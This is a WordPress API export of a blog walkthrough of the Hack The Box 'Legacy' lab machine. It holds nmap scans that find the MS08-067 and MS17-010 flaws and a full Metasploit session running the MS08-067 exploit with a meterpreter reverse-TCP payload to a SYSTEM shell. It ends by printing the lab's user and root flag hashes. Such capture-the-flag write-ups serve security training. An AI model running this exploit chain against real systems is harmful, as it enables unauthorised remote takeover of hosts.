{"id":3707,"date":"2020-08-04T21:55:47","date_gmt":"2020-08-04T12:55:47","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3707"},"modified":"2020-08-30T23:36:52","modified_gmt":"2020-08-30T14:36:52","slug":"hack-the-box-legacy-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3707","title":{"rendered":"Hack The Box &#8211; Legacy &#8211; Walkthrough"},"content":{"rendered":"<h3>Confirm that Samba is running<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 legacy.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 14:41 UTC\r\nNmap scan report for legacy.htb (10.10.10.4)\r\nHost is up (0.047s latency).\r\nNot shown: 97 filtered ports\r\nPORT     STATE  SERVICE       VERSION\r\n139\/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn\r\n445\/tcp  open   microsoft-ds  Windows XP microsoft-ds\r\n3389\/tcp closed ms-wbt-server\r\n<\/pre>\n<h3>Investigate Samba vulnerabilities<\/h3>\n<p>The host turned out to be affected by ms08-067 and ms17-010.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap --script=vuln -p 445 legacy.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 15:53 UTC\r\nNmap scan report for legacy.htb (10.10.10.4)\r\nHost is up (0.052s latency).\r\n\r\nPORT    STATE SERVICE\r\n445\/tcp open  microsoft-ds\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n\r\nHost script results:\r\n|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED\r\n| smb-vuln-ms08-067:\r\n|   VULNERABLE:\r\n|   Microsoft Windows system vulnerable to remote code execution (MS08-067)\r\n|     State: LIKELY VULNERABLE\r\n|     IDs:  CVE:CVE-2008-4250\r\n|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\r\n|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\r\n|           code via a crafted RPC request that triggers the overflow during path canonicalization.\r\n|\r\n|     Disclosure date: 2008-10-23\r\n|     References:\r\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms08-067.aspx\r\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2008-4250\r\n|_smb-vuln-ms10-054: false\r\n|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)\r\n| smb-vuln-ms17-010:\r\n|   VULNERABLE:\r\n|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\r\n|     State: VULNERABLE\r\n|     IDs:  CVE:CVE-2017-0143\r\n|     Risk factor: HIGH\r\n|       A critical remote code execution vulnerability exists in Microsoft SMBv1\r\n|        servers (ms17-010).\r\n|\r\n|     Disclosure date: 2017-03-14\r\n|     References:\r\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-0143\r\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms17-010.aspx\r\n|_      https:\/\/blogs.technet.microsoft.com\/msrc\/2017\/05\/12\/customer-guidance-for-wannacrypt-attacks\/\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 36.60 seconds\r\n<\/pre>\n<h3>Use ms08-067 as the starting point<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfconsole\r\n\r\nmsf5 &gt; search ms08-067\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                 Disclosure Date  Rank   Check  Description\r\n   -  ----                                 ---------------  ----   -----  -----------\r\n   0  exploit\/windows\/smb\/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption\r\n\r\nmsf5 &gt; use 0\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) &gt; show options\r\n\r\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n   RPORT    445              yes       The SMB service port (TCP)\r\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\r\n\r\n\r\nPayload options (windows\/meterpreter\/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT     4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic Targeting\r\n\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) &gt; set RHOSTS legacy.htb\r\nRHOSTS =&gt; legacy.htb\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) &gt; set LHOST 10.10.14.8\r\nLHOST =&gt; 10.10.14.5\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) &gt; set LPORT 1234\r\nLPORT =&gt; 1234\r\n\r\nmsf5 exploit(windows\/smb\/ms08_067_netapi) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.5:1234:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:1234\r\n&#x5B;*] 10.10.10.4:445 - Automatically detecting the target...\r\n&#x5B;*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English\r\n&#x5B;*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)\r\n&#x5B;*] 10.10.10.4:445 - Attempting to trigger the vulnerability...\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:1234 -&gt; 172.17.0.1:56878) at 2020-08-04 12:19:15 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\n\r\nmeterpreter &gt; shell\r\nProcess 1516 created.\r\nChannel 1 created.\r\nMicrosoft Windows XP &#x5B;Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32&gt;cd C:\\\r\ncd C:\\\r\n\r\nC:\\&gt;type &quot;C:\\Documents and Settings\\john\\Desktop\\user.txt&quot;\r\ntype &quot;C:\\Documents and Settings\\john\\Desktop\\user.txt&quot;\r\ne69af0e4f443de7e36876fda4ec7644f\r\nC:\\&gt;type &quot;C:\\Documents and Settings\\Administrator\\Desktop\\root.txt&quot;\r\ntype &quot;C:\\Documents and Settings\\Administrator\\Desktop\\root.txt&quot;\r\n993442d258b0e0ec917cae9e695d5713\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Confirm that Samba is running # nmap -A -n -F -T5 legacy.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 14:41 U [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3707"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3707"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3707\/revisions"}],"predecessor-version":[{"id":3792,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3707\/revisions\/3792"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2F
media&parent=3707"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3707"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3707"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}